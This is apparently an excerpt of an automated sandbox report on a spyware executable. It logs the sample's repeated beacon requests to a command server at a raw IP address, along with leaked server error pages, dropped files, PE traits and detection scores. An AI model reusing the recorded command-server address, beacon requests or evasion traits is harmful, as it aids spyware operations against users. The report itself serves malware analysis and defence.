/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153

Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49720 version: TLS 1.2

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.556175662.00000000009CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

PE file has a writeable .text section

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E6E02E	3_2_00E6E02E
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00CACD24	3_2_00CACD24
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E31FB7	3_2_00E31FB7
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E227AD	3_2_00E227AD
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00E22700	3_2_00E22700
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E6E02E	4_2_00E6E02E
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00CACD24	4_2_00CACD24
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E227AD	4_2_00E227AD
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E22700	4_2_00E22700
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00E31FB7	4_2_00E31FB7

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: String function: 00E214D0 appears 246 times
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: String function: 00CA1E2C appears 46 times
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: String function: 00E31A69 appears 36 times
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: String function: 00D0CF48 appears 88 times
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: String function: 00E20D99 appears 108 times
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: String function: 00E21503 appears 80 times
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: String function: 00E292B0 appears 66 times

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 3_2_00CAD519 NtQueryInformationFile,		3_2_00CAD519
Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe	Code function: 4_2_00CAD519 NtQueryInformationFile,		4_2_00CAD519

Source: Joe Sandbox View

Dropped File: C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe 38B2C7A1AF454D382927F81543D86055886BC028634575050367D052EFD26434

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe.3.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Static PE information: Section: .rdata ZLIB complexity 0.991296875
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Static PE information: Section: .reloc ZLIB complexity 0.9995031524122807
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe.3.dr	Static PE information: Section: .rdata ZLIB complexity 0.991296875
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe.3.dr	Static PE information: Section: .reloc ZLIB complexity 0.9995031524122807

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Virustotal: Detection: 64%
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	ReversingLabs: Detection: 96%

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

File read: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
Source: unknown	Process created: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe "C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe"
Source: unknown	Process created: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe "C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe"

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

File created: C:\Users\user\Documents\VlcpVideoV1.0.1

Jump to behavior

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@3/6@10/5

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE 